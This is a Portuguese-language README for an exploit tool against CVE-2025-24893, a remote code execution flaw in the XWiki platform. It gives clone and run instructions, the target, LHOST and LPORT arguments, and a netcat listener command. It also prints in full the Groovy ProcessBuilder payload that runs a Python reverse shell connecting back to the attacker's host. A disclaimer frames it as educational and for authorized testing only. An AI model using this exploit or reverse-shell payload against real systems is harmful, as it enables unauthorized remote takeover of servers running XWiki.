
Exploit modificado para CVE-2025-24893
Um script simples em Python3 para explorar a CVE-2025-24893, uma vulnerabilidade de execução remota de código na plataforma XWiki, usando uma macro assíncrona baseada em Groovy e um payload de reverse shell configurável.
⚠️ AVISO: Esta ferramenta é fornecida apenas para fins educacionais e de testes autorizados. O uso não autorizado contra sistemas que você não possui ou sem permissão explícita é ilegal e antiético.
ProcessBuilder para evitar as peculiaridades do Runtime.execrequestspip install requests
Clone este repositório:
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
<TARGET_DOMAIN>
O host XWiki (ex.: wiki.example.local).
<LHOST>
O IP da sua máquina atacante (onde seu listener está em execução).
<LPORT>
Sua porta do listener (inteiro).
nc -lvnp 4444
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
netcat se uma shell foi recebida.Antes de enviar o payload, o script:
https://<TARGET_DOMAIN>http://<TARGET_DOMAIN> se HTTPS falharIsso ajuda a garantir compatibilidade com implantações de protocolo misto.
Por padrão, o script usa um one-liner em Python3:
new ProcessBuilder(
['/bin/bash','-c',
'python3 -c \'import socket,subprocess,os;'
's=socket.socket();s.connect(("LHOST",LPORT));'
'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
build_payload() se precisar de uma shell diferente (ex.: Bash, Perl, PHP, etc.).Este projeto está licenciado sob a Licença MIT. Consulte o arquivo LICENSE para obter detalhes.
Esta ferramenta foi projetada apenas para avaliação de segurança autorizada e fins educacionais. Os autores não se responsabilizam pelo uso indevido. Sempre obtenha permissão explícita antes de testar qualquer sistema alvo.